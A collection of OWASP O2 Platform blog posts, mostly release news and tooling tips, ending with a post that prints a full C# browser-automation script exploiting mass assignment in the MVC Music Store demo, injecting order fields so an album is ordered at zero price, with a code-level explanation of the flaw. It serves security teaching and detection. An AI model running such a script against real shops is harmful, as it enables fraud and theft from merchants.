How to use the Console output in the C# REPL
The VisualStudio C# REPL – O2 Platform can be downloaded here. From the download link you get a Visual Studio Extension (.vsix file extension).
Since this REPL is a great tool for developers, I wanted to use the Console output feature, the following code snippet shows how to achieve this functionability:
var topPanel = "Util - ConsoleOut".popupWindow(500,300);
topPanel.add_ConsoleOut();
//O2File:API_ConsoleOut.cs
Console.WriteLine("This text should be displayed in the Console");
This code produces the following output:
This is a powerful (and easy) feature that can help us to take advantage of the time 🙂
The latest version of OWASP O2 Platform is available: Your feedback is appreciated!
The latest version of OWASP O2 Platform ( version 4.3) is now available for downloads. In the below screenshot (taken from the Dinis Cruz’s blog) you can see all this information:
O2 Platform latest version
In this image you can see that the download link is : http://tiny.cc/O2Platform.
One of our ideals is to build a strong platform that helps people and organizations to create secure applications, therefore we would like to hear from you. We would like to know what do you think about it, do you think we could provide more documentation and examples about the usage of O2? . Let us know about it and we’ll be happy to receive your feedback.
OWASP O2 Platform Presentation : A good starting point.
If you didn’t realize there is a OWASP O2 presentation, I would like to provide the links with very helpful information. The title of this presentation is: OWASP O2 Platform – Automating Security Knowledge through Unit Tests , created by Dinis Cruz.
You can access to this slides from two places:
- From Speaker Deck at https://speakerdeck.com/u/diniscruz/p/owasp-o2-platform-automating-security-knowledge-through-unit-tests
- From Dinis Cruz’s blog :http://diniscruz.blogspot.co.uk/p/owasp-o2-platform.html
I wanted to provide this information because I have seen positive comments from some of my colleagues in Costa Rica, after looking at the presentation, most of those folks saw the magic and power of O2 Platform.
The below image shows the first slide:
Enjoy it!
FxCop Security rules : A nice to have feature on top of O2 platform
While we have seen the effect of static analysis at run time in the community, which was first described with a PoC using Microsoft’s static analysis tool CAT.NET and OWASP O2 Platform on top o Visual Studio .Net, we strongly believe on the value added of using O2 platform as a part of our development work.
In this same way, a really nice to have feature would be an integration with FxCop . Namely, FxCop analyzes managed code and reports information about those assemblies. It analyzes several areas including : COM, Design, Globalization, Naming, Performance, Security and Usage.
The latest version of FxCop was included as a part of the Microsoft Windows SDK for Windows 7 and .NET Framework 4
Here you have some useful links with all the information about this tool:
- For downloading it:
http://blogs.msdn.com/b/codeanalysis/archive/2010/07/26/fxcop-10-0-is-available.aspx - The ISO files can also be downloaded from the below link:
http://www.microsoft.com/en-us/download/details.aspx?id=8442 - FxCop ASP.NET Security Rules : This is a really interesting project hosted at CodePlex and it offers a set of rules for ASP.NET applications:
- http://fxcopaspnetsecurity.codeplex.com/
It would be great to have those security rules available on O2 Platform and why not via real-time analysis :).
FxCop ASP.NET Security rules
NuGet packages for OWASP O2 Platform
NuGet is a really interesting mechanism to install plugins on top of you Visual Studio project in a really straightforward way. Dinis Cruz made the first components of O2 Platform available in a NuGet package.
Now NuGet presents a new paradigm to install useful tools and avoid all the complication of the XML configurations that usually is a pain. It’s really interesting to have all the OWASP O2 functionality available in this way. I bet this is going to be a better way to make it available in future releases or in the way we will publish features on top of Visual Studio .Net.
The below image show our look up :
Managing NuGet packages
Now we are going to look for our OWASP O2 packages:
OWASP O2 at NuGet
In order to simplify our lives, this mechanism is a really good option :).
Real-time Vulnerability Creation Feedback inside VisualStudio
There is a really interesting video that shows how to perform static analysis of code at the compilation time on top of Visual Studio.Net. The creation of this mechanism is really powerful , because at compilation time, you can find and correct most of the security holes we can create. Just imaging the valued added that this process can provide to a large software development projects?.
The complete information can be found at http://diniscruz.blogspot.com/2012/06/real-time-vulnerability-creation.html?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+DinisCruz+%28Dinis+Cruz+blog%29
And there is also a reddit thread if you want to get involved (I hope you are want).
New reddit community for OWASP O2 and Cat.Net
A new community has been created on Reddit for supporting Cat.Net , the static analysis engine created by Microsoft (but in the last year it has lack of support). We see an opportunity here to involve OWASP O2 platform and add value to our project in this new path of source code analysis.
Join this community today!
Reddit community
For more information visit http://diniscruz.blogspot.com/2012/06/new-reddit-community-for-catnet.html
Installing O2’s Visual Studio Add-in, Script environment in Visual Studio IDE
Here is a video on how can we install the OWASP O2 add-in on top of VisuaL Studio , the video can be found at:
http://diniscruz.blogspot.co.uk/2012/05/video-installing-o2s-visualstudio-2010.html
By the way, the Visual Studio add-in is located in your local copy of OWASP O2 Platform, in the O2.Platform.Projects folder there should be a Visual Studio Project named O2.VisualStudio.AddIn . The .AddIn file can be found in the binaries folder.
Visual Studio Addin
Once you have installed the Add-in, you will be able to use this powerful tool on top of Visual Studio IDE.
Setting useLegacyV2RuntimeActivationPolicy on O2
I just set the useLegacyV2RuntimeActivationPolicy flag on the O2’s O2 Platform.exe.config file (app.config) so that it possible to load up the CefSharp dlls (which are managed C++ assemblies built targeted to 2.0) and be able to Run Chrome inside O2
Not entirely sure what is the long term effects of this, but so far so good.
Here are some references:
- http://stackoverflow.com/questions/2455654/what-additional-configuration-is-necessary-to-reference-a-net-2-0-mixed-mode
- http://stackoverflow.com/questions/1604663/what-does-uselegacyv2runtimeactivationpolicy-do-in-the-net-4-config
- http://social.msdn.microsoft.com/Forums/en/clr/thread/58271e39-beca-49ac-90f9-e116fa3dd3c0
- http://social.msdn.microsoft.com/Forums/en/clr/thread/58271e39-beca-49ac-90f9-e116fa3dd3c0
Rant: Come on WordPress.com sort your site out, it took me 20m to post this ! (see Losing my mojo with WordPress.com (they’re not getting the basics right) (originally I was not able add hyperlinks to this post ext since wordpress’s link button in the editor was not working (another ‘back to basics’ example))
Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform
In this post, I’m going to show the value added of using OWASP O2 Platform to exploit (and therefore correct/detect/prevent) vulnerabilities on top of Microsoft MVC platform.
Background
The industry has broadly adopting MVC architecture to build Web applications during the last years for several reasons, including the rapid and efficient paradigm it represents to build really good applications.
Few weeks ago , a user exploited a vulnerability at GitHub . The vulnerability exploited in this case, represents an old issue in the MVC architecture of different frameworks including Rails. This vulnerability is often named mass assignment , but it is also known as over posting or autobinding. Dinis Cruz wrote an interesting post about this vulnerability in the Spring MVC framework in this post http://diniscruz.blogspot.com/2012/04/we-need-security-focused-saststatic.html.
In this same line, Dinis wrote a really nice O2 script that allows to exploit this vulnerability on top of Microsoft MVC . In order to illustrate this use case of OWASP O2 platform, Dinis used a demo MVC application named MVC Music Store hosted in CodePlex( this is a great application that shows the use of this architecture).
Once you have this application up and running , then you probably are going to see something like this:
ASP.NET MVC MUSIC STORE
O2 Script to exploit the vulnerability
Dinis wrote the following script below to exploit this vulnerability, basically it is an IE automation script very powerful to overposting some post form fields and update them. Let’s see the script and then a quick explanation about it.
var ie = "ie_Fyila".o2Cache(()=> panel.clear().add_IE()).silent(true); // ie ramdon value for o2cache makes this object to unique amongst multiple instances of this control
var site = "http://localhost:26641";
Action<string,string,string> register =
(username, password,email)=>{
ie.open(site + "/Account/Register");
ie.field("UserName").value(username);
ie.field("Email").value(email);
ie.field("Password").value(password);
ie.field("ConfirmPassword").value(password);
ie.button("Register").click();
};
Action loginAsTestUser =
()=>{
var user1_name = "test_user".add_RandomLetters(5);
var user1_email = "test@testuser.com";
var user1_pwd = "a pwd".add_RandomLetters(10);
register(user1_name, user1_pwd, user1_email);
};
Action selectTestProductAndCheckout =
()=>{
ie.link("Rock").scrollIntoView().flash().click();
//Selection Led Zeppeling I album
ie.link(" Led Zeppelin I ").scrollIntoView().flash().click();
ie.link("Add to cart").flash().click();
ie.link("Checkout >>").flash().click();
};
Action populateSubmitOrder =
()=>{
var Address = "Foo Address";
var City = "Foo City";
var Country = "Foo Country";
var Email = "Email@email.com";
var FirstName = "Foo FirstName";
var LastName = "Foo LastName";
var Phone = "Foo Phone";
var PostalCode = "AAA BBB";
var State = "Foo State";
var PromoCode = "FREE"; // currently hard coded promotional code
ie.field("Address").value(Address);
ie.field("City").value(City);
ie.field("Country").value(Country);
ie.field("Email").value(Email);
ie.field("FirstName").value(FirstName);
ie.field("LastName").value(LastName);
ie.field("Phone").value(Phone);
ie.field("PostalCode").value(PostalCode);
ie.field("PromoCode").value(PromoCode);
ie.field("State").value(State);
};
Action submitOrder =
()=>{
ie.button("Submit Order").click();
};
Action createOrderUsingTestUser =
()=>{
loginAsTestUser();
selectTestProductAndCheckout();
populateSubmitOrder();
submitOrder();
};
Action injectField =
(fieldName, value)=>{
ie.field("FirstName")
.injectHtml_afterEnd("
{0}:<input type="text" name="{0}" value="{1}" />".format(fieldName, value));
};
Action runExploit_1 =
()=>{
loginAsTestUser();
selectTestProductAndCheckout();
populateSubmitOrder();
//the following simulates adding this to the POST request following URI Convention:
//OrderDetails[0].OrderDetailId=1&OrderDetails[0].OrderId=1&OrderDetails[0].AlbumId=1&OrderDetails[0].Quantity=1&OrderDetails[0].UnitPrice=5&
injectField("OrderDetails[0].OrderDetailId","1");
injectField("OrderDetails[0].OrderId","1");
injectField("OrderDetails[0].AlbumId","1");
injectField("OrderDetails[0].Quantity","1");
injectField("OrderDetails[0].UnitPrice","0");
submitOrder();
ie.open(site + "/OrderDetails");
};
runExploit_1();
return "done";
//O2File:WatiN_IE_ExtensionMethods.cs
//O2Ref:WatiN.Core.1x.dll
//O2Tag_DontAddExtraO2Files;
If you look at this script, you will notice that it purpose is to register a user, select an album and submit the order, but look that the script injects other fields (related to other album), so we are buying just one album but we are also submitting a second one by injecting it as a part of the HTML form fields, and guess what? it is for free :).
This is the HTTP Post form field that were sent to the server:
HTTP form post fields using Fiddler
And this is how our order detail looks like :
Order details
How was this possible?
If you look at the Orders model, you will notice that this model has some properties and the last one is a list of OrderDetails and lf you look carefully, then you will see that this property is not protected against modifications (like using ReadOnly attributes) . That makes possible that we could send some other fields as a part of the request.
//Some properties of the Orders model.
[Required(ErrorMessage = "Email Address is required")]
[DisplayName("Email Address")]
[RegularExpression(@"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}",ErrorMessage = "Email is is not valid.")]
[DataType(DataType.EmailAddress)]
public string Email { get; set; }
[ScaffoldColumn(false)]
public decimal Total { get; set; }
public List<OrderDetail> OrderDetails { get; set; }
The Checkout controller accepts a FormCollection as a parameter and it holds all the HTTP POST form fields, from the below image you can see that it has the data for the second order.
Checkout controller
Final thoughts
This script is one of the many examples of the advantage of using O2 scripts, we were able to exploit a vulnerability on top of Microsoft MVC. The script is quite simple and easy to read, apart from that, it is powerful enough to identify this kind of problems. The IE automation section in OWASP O2 Platform represents a new paradigm in the automation process and it power allow us to make Web Application Security visible.
As you can see, it is easy to fall in this vulnerability, probably you can argue that this kind of issue might be solved using good design and best practices and you probably are right, but we are vulnerable when somebody could forget all the mechanisms to write secure code, specially when working with this kind of architecture.
I would like to thank to Dinis Cruz for making this script available and all his work in the O2 Platform project.
About
The O2 platform represents a new paradigm for how to perform, document and distribute Web Application security reviews. O2 is designed to Automate Security Consultants Knowledge and Workflows and to Allow non-security experts to access and consume Security Knowledge.
O2 can also be a very powerful prototyping and fast-development tool for .NET. Most O2 APIs are written using a Fluent API design, and its core has been published as a separate project called FluentSharp (hosted at CodePlex)
Download
Windows ClickOnce Installer:
Mailing List
The best place to keep updated with the lastest news and developers it to subscribe to the OWASP O2 Platform Mailing list (you can read its archives here)
OWASP O2 Platform Blog 